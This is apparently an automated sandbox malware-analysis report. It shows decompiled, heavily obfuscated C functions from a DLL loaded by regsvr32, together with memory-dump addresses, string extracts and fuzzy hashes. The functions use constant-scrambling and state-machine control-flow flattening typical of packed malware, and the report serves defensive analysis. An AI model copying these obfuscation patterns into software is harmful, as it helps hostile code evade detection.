0x10020786
0x100207ab
0x100207ab
0x00000000
0x00000000
0x00000000
0x00000000
0x10020788
0x10020788
0x10020788
0x1002078a
0x1002078c
0x10020792
0x10020792
0x10020794
0x1002079a
0x1002079a
0x1002079c
0x100207a2
0x100207a2
0x00000000
0x100207a2
0x1002079e
0x100207a0
0x00000000
0x00000000
0x00000000
0x100207a0
0x10020796
0x10020798
0x00000000
0x00000000
0x00000000
0x10020798
0x1002078e
0x10020790
0x00000000
0x00000000
0x00000000
0x100207a5
0x100207a5
0x100207a6
0x100207a6
0x00000000
0x100207ad
0x100207ad
0x100207ad
0x00000000

Strings

$7, xrefs: 10020529
*, xrefs: 100206E0
H, xrefs: 100204AD
z, xrefs: 100205C2
^`9, xrefs: 100204E6

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $7$^`9$z$H$*
API String ID: 0-3857458238
Opcode ID: 7dfdc380dc5cb0904ef7ce01046d8311082d61fd9741e8476c7dbdb70e2b4044
Instruction ID: 169cd806e0f3b07825d4a17f15a5bc6d3608298ea8a8a32142088e0416f11e29
Opcode Fuzzy Hash: 7dfdc380dc5cb0904ef7ce01046d8311082d61fd9741e8476c7dbdb70e2b4044
Instruction Fuzzy Hash: BEA132715083819BC354CF25D886A4FFBE2EBC9798F50891DF18696261C3B19A89CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10013CDD Relevance: 6.4, Strings: 5, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10013CDD(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v564;
				intOrPtr _v568;
				char _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				void* _t138;
				signed int _t156;
				signed int _t157;
				void* _t162;
				signed int _t166;
				intOrPtr _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t197;
				void* _t198;

				_push(_a8);
				_t189 = __edx;
				_push(_a4);
				_push(__edx);
				_push(E10005942);
				E10009E7D(_t138);
				_v640 = 0x901356;
				_t198 = _t197 + 0x10;
				_v640 = _v640 ^ 0xa73d138b;
				_v640 = _v640 + 0xff98;
				_t162 = 0x667d7e7;
				_v640 = _v640 ^ 0xa7ae0077;
				_v664 = 0x34cfef;
				_v664 = _v664 | 0xff73bc8f;
				_v664 = _v664 + 0x34e7;
				_v664 = _v664 ^ 0xff7834d6;
				_v672 = 0x7b2bed;
				_v672 = _v672 + 0x34f4;
				_v672 = _v672 + 0x493;
				_t190 = 0x43;
				_v672 = _v672 / _t190;
				_v672 = _v672 ^ 0x000b1305;
				_v632 = 0x593740;
				_t31 =  &_v632; // 0x593740
				_t191 = 0x3b;
				_v632 =  *_t31 / _t191;
				_v632 = _v632 << 3;
				_v632 = _v632 ^ 0x000ae0da;
				_v624 = 0x358ade;
				_v624 = _v624 + 0xffff922e;
				_v624 = _v624 ^ 0x0039ba31;
				_v644 = 0x72a4ef;
				_v644 = _v644 ^ 0xc45f4f5d;
				_v644 = _v644 << 0xe;
				_v644 = _v644 ^ 0x7aebd691;
				_v636 = 0xbe1d8a;
				_v636 = _v636 ^ 0x672a8aa3;
				_v636 = _v636 + 0xffff1f4e;
				_v636 = _v636 ^ 0x679b1c5e;
				_v660 = 0x9f3013;
				_t192 = 0x57;
				_v660 = _v660 / _t192;
				_v660 = _v660 | 0x877a6ad0;
				_v660 = _v660 << 3;
				_v660 = _v660 ^ 0x3bd14363;
				_v652 = 0x9152b7;
				_v652 = _v652 + 0xffff0547;
				_v652 = _v652 | 0x5a21bed2;
				_v652 = _v652 ^ 0x5ab9f5b8;
				_v668 = 0xb44877;
				_v668 = _v668 | 0xed1b7373;
				_t193 = 0x3a;
				_v668 = _v668 / _t193;
				_v668 = _v668 * 0x67;
				_v668 = _v668 ^ 0xa6320a9f;
				_v656 = 0x4376e1;
				_v656 = _v656 + 0xffff561e;
				_v656 = _v656 * 5;
				_t194 = 0x38;
				_v656 = _v656 / _t194;
				_v656 = _v656 ^ 0x00050236;
				_v628 = 0x678d06;
				_v628 = _v628 << 5;
				_v628 = _v628 ^ 0x0cfa96fb;
				_t195 = _v628;
				_v648 = 0x1eb694;
				_v648 = _v648 * 0x55;
				_v648 = _v648 >> 8;
				_v648 = _v648 ^ 0x0009dec4;
				L1:
				while(_t162 != 0x107973e) {
					if(_t162 == 0x4e02750) {
						_t157 = E1001EFA0( &_v564, _v660, _v652, _t195, _v668);
						_t198 = _t198 + 0xc;
						L12:
						asm("sbb ecx, ecx");
						_t166 =  ~_t157 & 0xfd760838;
						L10:
						_t162 = _t166 + 0xaa4a651;
						continue;
					}
					if(_t162 == 0x667d7e7) {
						_v568 = _t189;
						_t162 = 0x107973e;
						continue;
					}
					if(_t162 == 0x71084a2) {
						_v564 = 0x22c;
						_t157 = E10011A72(_v644,  &_v564, _t195, _v636);
						goto L12;
					}
					if(_t162 == 0x81aae89) {
						_t157 = E10005942(_t162, __eflags,  &_v564,  &_v620);
						asm("sbb ecx, ecx");
						_t166 =  ~_t157 & 0xfa3b80ff;
						__eflags = _t166;
						goto L10;
					}
					if(_t162 != 0xaa4a651) {
						L18:
						__eflags = _t162 - 0x9c8fbf1;
						if(__eflags != 0) {
							continue;
						}
						return _t157;
					}
					return E1001E373(_v656, _t195, _v628, _v648);
				}
				_push(_t162);
				_t156 = E1000B34C(_v640, _v664);
				_t195 = _t156;
				_t198 = _t198 + 0xc;
				__eflags = _t156 - 0xffffffff;
				if(__eflags == 0) {
					_t162 = 0x9c8fbf1;
					goto L18;
				}
				_t162 = 0x71084a2;
				goto L1;
			}

0x10013ce7
0x10013cee
0x10013cf0
0x10013cf7
0x10013cf8
0x10013cfd
0x10013d02
0x10013d0a
0x10013d0d
0x10013d17
0x10013d1f
0x10013d24
0x10013d2c
0x10013d34
0x10013d3c
0x10013d44
0x10013d4c
0x10013d54
0x10013d5c
0x10013d6a
0x10013d6f
0x10013d75
0x10013d7d
0x10013d85
0x10013d89
0x10013d8e
0x10013d94
0x10013d99
0x10013da1
0x10013da9
0x10013db1
0x10013db9
0x10013dc1
0x10013dc9
0x10013dce
0x10013dd6
0x10013dde
0x10013de6
0x10013dee
0x10013df6
0x10013e02
0x10013e07
0x10013e0d
0x10013e15
0x10013e1a
0x10013e22
0x10013e2a
0x10013e32
0x10013e3a
0x10013e42
0x10013e4a
0x10013e56
0x10013e59
0x10013e62
0x10013e66
0x10013e6e
0x10013e76
0x10013e85
0x10013e8f
0x10013e9c
0x10013ea0
0x10013ea8
0x10013eb0
0x10013eb5
0x10013ebd
0x10013ec1
0x10013ece
0x10013ed2
0x10013ed7
0x00000000
0x10013edf
0x10013eed
0x10013fa8
0x10013fad
0x10013f7b
0x10013f7f
0x10013f81
0x10013f55
0x10013f55
0x00000000
0x10013f55
0x10013ef9
0x10013f89
0x10013f8d
0x00000000
0x10013f8d
0x10013f05
0x10013f69
0x10013f74
0x00000000
0x10013f7a
0x10013f0d
0x10013f44
0x10013f4d
0x10013f4f
0x10013f4f
0x00000000
0x10013f4f
0x10013f11
0x10013fe5
0x10013fe5
0x10013feb
0x00000000
0x00000000
0x00000000
0x10013feb
0x00000000
0x10013f2b
0x10013fbe
0x10013fc7
0x10013fcc
0x10013fce
0x10013fd1
0x10013fd4
0x10013fe0
0x00000000
0x10013fe0
0x10013fd6
0x00000000

Strings

+{, xrefs: 10013D4C
vC, xrefs: 10013E6E
4, xrefs: 10013D3C
@7Y, xrefs: 10013D85
w, xrefs: 10013D24

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @7Y$w$+{$4$vC
API String ID: 0-3184633685
Opcode ID: c3cc0178af7b35ccc04b10425d48fb49d6a4219554ff27db659c939c603f64a2
Instruction ID: aa9e5b5f79715d3b97ffb88f0442a637caa8434461cf92cfce9f91445313ded0
Opcode Fuzzy Hash: c3cc0178af7b35ccc04b10425d48fb49d6a4219554ff27db659c939c603f64a2
Instruction Fuzzy Hash: 737164715093019FC368CE25C54955FFBF0EBC9758F10892DF29A9A2A0D7B1DA4A8F83

Uniqueness

Uniqueness Score: -1.00%

Function 100151E8 Relevance: 6.4, Strings: 5, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E100151E8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				unsigned int _v76;
				void* _t137;
				void* _t154;
				void* _t161;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				intOrPtr _t179;
				signed int* _t182;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t137);
				_v16 = 0x9af955;
				_t182 =  &(( &_v76)[4]);
				_v12 = 0x1b5135;
				_t179 = 0;
				_v8 = 0xe54836;
				_v4 = 0;
				_t161 = 0x7605a4;
				_v64 = 0x540f8d;
				_v64 = _v64 + 0x3add;
				_t175 = 0x4f;
				_v64 = _v64 / _t175;
				_v64 = _v64 ^ 0x00011125;
				_v28 = 0x405334;
				_v28 = _v28 | 0xcbad7b38;
				_v28 = _v28 ^ 0xcbed7b3d;
				_v32 = 0xa5c606;
				_t176 = 0x68;
				_v32 = _v32 / _t176;
				_v32 = _v32 ^ 0x4001980e;
				_v48 = 0xf82e05;
				_v48 = _v48 << 0xa;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0x30280000;
				_v52 = 0x6ca2fa;
				_t177 = 0x54;
				_v52 = _v52 * 0x69;
				_v52 = _v52 + 0xffff8954;
				_v52 = _v52 ^ 0x2c866bac;
				_v72 = 0x4322f2;
				_v72 = _v72 << 2;
				_v72 = _v72 + 0xffffcf32;
				_v72 = _v72 + 0x4443;
				_v72 = _v72 ^ 0x0104f745;
				_v56 = 0x7f74d3;
				_v56 = _v56 << 0xd;
				_v56 = _v56 ^ 0xde54043f;
				_v56 = _v56 ^ 0x30c09076;
				_v60 = 0x81be54;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x00096d75;
				_v68 = 0x4c6b15;
				_v68 = _v68 ^ 0x89160e43;
				_v68 = _v68 + 0x3a06;
				_v68 = _v68 ^ 0x895c9da1;
				_v76 = 0x1e047f;
				_v76 = _v76 << 1;
				_v76 = _v76 >> 5;
				_v76 = _v76 + 0x933f;
				_v76 = _v76 ^ 0x0000f0cc;
				_v24 = 0x503e41;
				_v24 = _v24 + 0xffff70e6;
				_v24 = _v24 ^ 0x0043ab60;
				_v36 = 0xaba6d2;
				_v36 = _v36 + 0xffff8fcb;
				_v36 = _v36 / _t177;
				_v36 = _v36 ^ 0x000ec139;
				_v40 = 0xd0b80c;
				_v40 = _v40 ^ 0xa61f0306;
				_v40 = _v40 | 0x1a03d98f;
				_v40 = _v40 ^ 0xbeccfe36;
				_v44 = 0x609ff;
				_v44 = _v44 << 0x10;
				_v44 = _v44 + 0x6f65;
				_v44 = _v44 ^ 0x09fe4ea8;
				while(_t161 != 0x7605a4) {
					if(_t161 == 0x1c7fa4c) {
						E1000C63A(_t179, _a8, _v24, _a4, _v36, _v40, _v44,  &_v20, _v48 | _v28);
					} else {
						if(_t161 == 0xd364bf8) {
							_t154 = E1000C63A(0, _a8, _v52, _a4, _v72, _v56, _v60,  &_v20, _v32 | _v64);
							_t182 =  &(_t182[7]);
							if(_t154 != 0) {
								_t161 = 0xf281704;
								continue;
							}
						} else {
							if(_t161 != 0xf281704) {
								L10:
								if(_t161 != 0x2e2117d) {
									continue;
								} else {
								}
							} else {
								_push(_t161);
								_t179 = E1001EAA3(_v20 + _v20);
								if(_t179 != 0) {
									_t161 = 0x1c7fa4c;
									continue;
								}
							}
						}
					}
					return _t179;
				}
				_t161 = 0xd364bf8;
				goto L10;
			}

0x100151ef
0x100151f3
0x100151f7
0x100151f8
0x100151f9
0x100151fe
0x10015206
0x10015209
0x10015211
0x10015213
0x1001521d
0x10015221
0x10015226
0x1001522e
0x1001523c
0x10015241
0x10015247
0x1001524f
0x10015257
0x1001525f
0x10015267
0x10015273
0x10015278
0x1001527e
0x10015286
0x1001528e
0x10015293
0x10015298
0x100152a0
0x100152ad
0x100152ae
0x100152b2
0x100152ba
0x100152c2
0x100152ca
0x100152cf
0x100152d7
0x100152df
0x100152e7
0x100152ef
0x100152f4
0x100152fc
0x10015304
0x1001530c
0x10015311
0x10015316
0x1001531e
0x10015326
0x1001532e
0x10015336
0x1001533e
0x10015346
0x1001534a
0x1001534f
0x10015357
0x1001535f
0x10015367
0x1001536f
0x10015377
0x1001537f
0x1001538d
0x10015391
0x10015399
0x100153a1
0x100153a9
0x100153b6
0x100153c3
0x100153d0
0x100153d5
0x100153dd
0x100153e5
0x100153ef
0x10015485
0x100153f1
0x100153f3
0x10015441
0x10015446
0x1001544b
0x1001544d
0x00000000
0x1001544d
0x100153f5
0x100153f7
0x10015453
0x10015459
0x00000000
0x00000000
0x1001545b
0x100153f9
0x10015405
0x1001540e
0x10015413
0x10015415
0x00000000
0x10015415
0x10015413
0x100153f7
0x100153f3
0x10015496
0x10015496
0x10015451
0x00000000

Strings

um, xrefs: 10015316
6H, xrefs: 10015213
CD, xrefs: 100152D7
eo, xrefs: 100153D5
A>P, xrefs: 1001535F

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6H$A>P$CD$eo$um
API String ID: 0-474192316
Opcode ID: bdc05370bd18edc790754d76cbe1884f86963dceaa53ffeff6fcce3df0e826e7
Instruction ID: ce07ed2dc19e39ce868b1cc9942b41c50acd247ed2c1bda6c896a4e23299e468
Opcode Fuzzy Hash: bdc05370bd18edc790754d76cbe1884f86963dceaa53ffeff6fcce3df0e826e7
Instruction Fuzzy Hash: F26114725083819BC794CF65C58980FFBE1FBC4B98F405A1DF5D69A260D3B6CA488B43

Uniqueness

Uniqueness Score: -1.00%

Function 10020E6D Relevance: 6.4, Strings: 5, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10020E6D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t118;
				intOrPtr _t130;
				void* _t132;
				void* _t136;
				signed int _t149;
				signed int _t150;
				void* _t152;
				signed int* _t155;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(1);
				E10009E7D(_t118);
				_v44 = 0x66199f;
				_t155 =  &(( &_v56)[7]);
				_v44 = _v44 + 0xfffffabf;
				_v44 = _v44 + 0xffffe054;
				_t152 = 0;
				_v44 = _v44 ^ 0x0067907b;
				_t136 = 0x84f59d1;
				_v12 = 0x62824d;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0x141493b5;
				_v16 = 0xbf8aac;
				_v16 = _v16 | 0x1eae06b7;
				_v16 = _v16 ^ 0x1ebfafbc;
				_v20 = 0xbd0bd;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x005f6cec;
				_v24 = 0x2eb797;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x000a7760;
				_v48 = 0xc83a57;
				_v48 = _v48 + 0x6a0c;
				_v48 = _v48 + 0xea21;
				_v48 = _v48 ^ 0x00c71660;
				_v32 = 0x7f74f3;
				_v32 = _v32 | 0x35d9d8f2;
				_t149 = 0x7e;
				_v32 = _v32 * 0x32;
				_v32 = _v32 ^ 0x8bfa8ad6;
				_v56 = 0xfa7478;
				_v56 = _v56 + 0xffff2020;
				_v56 = _v56 / _t149;
				_v56 = _v56 + 0xffff71f0;
				_v56 = _v56 ^ 0x0006add5;
				_v36 = 0x466b2d;
				_v36 = _v36 + 0xffffc14a;
				_t150 = 0x61;
				_v36 = _v36 * 0x46;
				_v36 = _v36 ^ 0x133c35c0;
				_v40 = 0xf372a3;
				_v40 = _v40 ^ 0x07c6a541;
				_v40 = _v40 * 0x3b;
				_v40 = _v40 ^ 0xa9663e8c;
				_v52 = 0x25bb81;
				_v52 = _v52 ^ 0xfd95637b;
				_v52 = _v52 + 0x14ad;
				_v52 = _v52 | 0xe0f9087f;
				_v52 = _v52 ^ 0xfdf73875;
				_v8 = 0x73b574;
				_v8 = _v8 + 0x2133;
				_v8 = _v8 ^ 0x00791454;
				_v28 = 0xffe2b9;
				_v28 = _v28 / _t150;
				_v28 = _v28 + 0xffff81f3;
				_v28 = _v28 ^ 0x0000fb3e;
				_t151 = _v4;
				do {
					while(_t136 != 0x181a049) {
						if(_t136 == 0x1e2419a) {
							_t130 = E1000FBF8();
							_t151 = _t130;
							if(_t130 != 0xffffffff) {
								_t136 = 0x96abfc2;
								continue;
							}
						} else {
							if(_t136 == 0x84f59d1) {
								_t136 = 0x1e2419a;
								continue;
							} else {
								if(_t136 == 0x96abfc2) {
									_t132 = E1001D0A1(_v16,  &_v4, _v20, _v24, _t151, _v48);
									_t155 =  &(_t155[4]);
									if(_t132 != 0) {
										_t136 = 0x181a049;
										continue;
									}
								} else {
									if(_t136 != 0xe6457b9) {
										goto L14;
									} else {
										E1001E373(_v52, _v4, _v8, _v28);
									}
								}
							}
						}
						L7:
						return _t152;
					}
					E10002F1A(_v32, _v56, _t136, _v4, 1, _v36, 1, _v40, _a20, _a16);
					_t155 =  &(_t155[8]);
					_t136 = 0xe6457b9;
					_t152 =  !=  ? 1 : _t152;
					L14:
				} while (_t136 != 0x782f1d3);
				goto L7;
			}

0x10020e74
0x10020e7a
0x10020e7f
0x10020e83
0x10020e87
0x10020e8b
0x10020e8c
0x10020e8d
0x10020e92
0x10020e9a
0x10020e9d
0x10020ea7
0x10020eaf
0x10020eb1
0x10020eb9
0x10020ebe
0x10020ecb
0x10020ed0
0x10020ed8
0x10020ee0
0x10020ee8
0x10020ef0
0x10020ef8
0x10020efd
0x10020f05
0x10020f0d
0x10020f12
0x10020f1a
0x10020f22
0x10020f2a
0x10020f32
0x10020f3a
0x10020f42
0x10020f51
0x10020f54
0x10020f58
0x10020f60
0x10020f68
0x10020f78
0x10020f7c
0x10020f84
0x10020f8c
0x10020f94
0x10020fa1
0x10020fa2
0x10020fa6
0x10020fae
0x10020fb6
0x10020fc3
0x10020fc7
0x10020fcf
0x10020fd7
0x10020fdf
0x10020fe7
0x10020fef
0x10020ff7
0x10020fff
0x10021007
0x1002100f
0x1002101d
0x10021021
0x10021029
0x10021031
0x10021035
0x10021035
0x10021043
0x100210b6
0x100210bb
0x100210c0
0x100210c2
0x00000000
0x100210c2
0x10021045
0x1002104b
0x100210a7
0x00000000
0x1002104d
0x10021053
0x10021097
0x1002109c
0x100210a1
0x100210a3
0x00000000
0x100210a3
0x10021055
0x1002105b
0x00000000
0x10021061
0x10021071
0x10021077
0x1002105b
0x10021053
0x1002104b
0x10021079
0x10021081
0x10021081
0x100210eb
0x100210f0
0x100210f3
0x100210fa
0x100210fd
0x100210fd
0x00000000

Strings

3!, xrefs: 10020FFF
!, xrefs: 10020F2A
`w, xrefs: 10020F12
l_, xrefs: 10020EFD
-kF, xrefs: 10020F8C

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$-kF$3!$`w$l_
API String ID: 0-379462258
Opcode ID: 2fa16581161ee2b7ac1e6fd236ea0f7498a49858d4db8b5c1e4d9f678a716055
Instruction ID: 0921171a5d8d4b3ad028902528ff36cbd7c380b641b7beed472558395c55b2ab
Opcode Fuzzy Hash: 2fa16581161ee2b7ac1e6fd236ea0f7498a49858d4db8b5c1e4d9f678a716055
Instruction Fuzzy Hash: D86122715083419FC344CE64D88585FFBE1FBD83A8F504A1DF69656260D3B58A8A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 1001E612 Relevance: 6.4, Strings: 5, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E1001E612() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				intOrPtr _t98;
				intOrPtr _t99;
				void* _t106;
				void* _t108;
				intOrPtr _t112;
				intOrPtr _t114;
				unsigned int* _t118;

				_t118 =  &_v48;
				_v40 = 0x22c15d;
				_v40 = _v40 << 3;
				_v40 = _v40 * 0x41;
				_t106 = 0x33d0873;
				_v40 = _v40 * 0x72;
				_v40 = _v40 ^ 0x7007af50;
				_v24 = 0x5a7132;
				_v24 = _v24 + 0x5209;
				_v24 = _v24 | 0x76973bc0;
				_v24 = _v24 ^ 0x76dffbfb;
				_v36 = 0x9e6203;
				_v36 = _v36 >> 9;
				_v36 = _v36 + 0xffffc4fa;
				_v36 = _v36 ^ 0x0009d94f;
				_v48 = 0x4cb555;
				_v48 = _v48 + 0xffff98a4;
				_v48 = _v48 | 0x78e24425;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x078ed698;
				_v20 = 0xad21c4;
				_v20 = _v20 ^ 0x4b02d518;
				_v20 = _v20 ^ 0x4ba0e709;
				_v28 = 0x40ab49;
				_v28 = _v28 + 0xffff03a7;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x01f849a0;
				_v32 = 0x9c8b1d;
				_v32 = _v32 + 0xffff2d46;
				_v32 = _v32 ^ 0x8207e04a;
				_v32 = _v32 ^ 0x8298dfdf;
				_v4 = 0x34f563;
				_v4 = _v4 | 0x108f09fd;
				_v4 = _v4 ^ 0x10b8ff7e;
				_v44 = 0x5e3893;
				_v44 = _v44 + 0x4e25;
				_v44 = _v44 | 0xbf7bf7f7;
				_v44 = _v44 ^ 0xbf7751e1;
				_v8 = 0x10c2ca;
				_v8 = _v8 * 0x7f;
				_v8 = _v8 ^ 0x0857da70;
				_v12 = 0xd3dc4f;
				_v12 = _v12 | 0x4ad81fc7;
				_v12 = _v12 ^ 0x4adfe8ae;
				_v16 = 0xb04d4;
				_v16 = _v16 | 0x306e6251;
				_v16 = _v16 ^ 0x30690823;
				do {
					while(_t106 != 0x20c24bd) {
						if(_t106 == 0x313884f) {
							_push(_v32);
							_push(_v28);
							_t99 = E1002032A(_v20);
							_t114 =  *0x10024210; // 0x0
							_t118 = _t118 - 0xc + 0x14;
							_t106 = 0x20c24bd;
							 *((intOrPtr*)(_t114 + 4)) = _t99;
							continue;
						} else {
							if(_t106 == 0x33d0873) {
								_push(_t106);
								_t108 = 0x18;
								_t114 = E1001EAA3(_t108);
								_t106 = 0x313884f;
								 *0x10024210 = _t114;
								continue;
							}
						}
						goto L7;
					}
					_push(_t106);
					_push(_t106);
					_t98 = E1001AA59(_v4, 0, _v40, _v44, E10005C9A, _v24, _v8, _v12, _v16);
					_t112 =  *0x10024210; // 0x0
					_t118 =  &(_t118[9]);
					_t106 = 0x67b3442;
					 *((intOrPtr*)(_t112 + 0x14)) = _t98;
					L7:
				} while (_t106 != 0x67b3442);
				return 0 | _t114 != 0x00000000;
			}

0x1001e612
0x1001e615
0x1001e61d
0x1001e634
0x1001e638
0x1001e64a
0x1001e64e
0x1001e656
0x1001e65e
0x1001e666
0x1001e66e
0x1001e676
0x1001e67e
0x1001e683
0x1001e68b
0x1001e693
0x1001e69b
0x1001e6a3
0x1001e6ab
0x1001e6b0
0x1001e6b8
0x1001e6c0
0x1001e6c8
0x1001e6d0
0x1001e6d8
0x1001e6e0
0x1001e6e5
0x1001e6ed
0x1001e6f5
0x1001e6fd
0x1001e705
0x1001e70d
0x1001e715
0x1001e71d
0x1001e725
0x1001e72d
0x1001e735
0x1001e73d
0x1001e745
0x1001e752
0x1001e756
0x1001e75e
0x1001e766
0x1001e76e
0x1001e776
0x1001e77e
0x1001e786
0x1001e794
0x1001e794
0x1001e79a
0x1001e7be
0x1001e7c5
0x1001e7cd
0x1001e7d2
0x1001e7d8
0x1001e7db
0x1001e7dd
0x00000000
0x1001e79c
0x1001e79e
0x1001e7a8
0x1001e7ab
0x1001e7b2
0x1001e7b4
0x1001e7b6
0x00000000
0x1001e7b6
0x1001e79e
0x00000000
0x1001e79a
0x1001e7e2
0x1001e7e3
0x1001e807
0x1001e80c
0x1001e812
0x1001e815
0x1001e817
0x1001e81a
0x1001e81a
0x1001e830

Strings

R, xrefs: 1001E65E
2qZ, xrefs: 1001E656
%Dx, xrefs: 1001E6A3
Qbn0, xrefs: 1001E77E
%N, xrefs: 1001E72D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: R$%Dx$%N$2qZ$Qbn0
API String ID: 0-3168811252
Opcode ID: 3c08a12afd6dfb153d75d74b41a8c11cbfd0804ae51c6344b7d50c8fec2e7236
Instruction ID: 6811a53b2856cd79094a04250afb10f10edcbe48e88f6d5c0a9f003103bb2040
Opcode Fuzzy Hash: 3c08a12afd6dfb153d75d74b41a8c11cbfd0804ae51c6344b7d50c8fec2e7236
Instruction Fuzzy Hash: 5A5124715083819FC788CF25D58540FBBE1FBC4358F609A1DF09A9A261D7B0DA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 6DA40A17 Relevance: 6.0, APIs: 4, Instructions: 42
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6DA40A17(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;

				_t15 = __ecx;
				if((E6DA43579(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E6DA4054C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t18 = E6DA3F1B8();
				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x6da40a1c
0x6da40a28
0x6da40a70
0x6da40a72
0x6da40a79
0x00000000
0x6da40a7b
0x6da40a2f
0x6da40a33
0x00000000
0x6da40a56
0x6da40a65
0x00000000
0x6da40a6d

APIs

Part of subcall function 6DA43579: GetWindowLongA.USER32(CCCCCCCC,000000F0), ref: 6DA43584

GetKeyState.USER32(00000010), ref: 6DA40A3D
GetKeyState.USER32(00000011), ref: 6DA40A46
GetKeyState.USER32(00000012), ref: 6DA40A4F
SendMessageA.USER32 ref: 6DA40A65

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
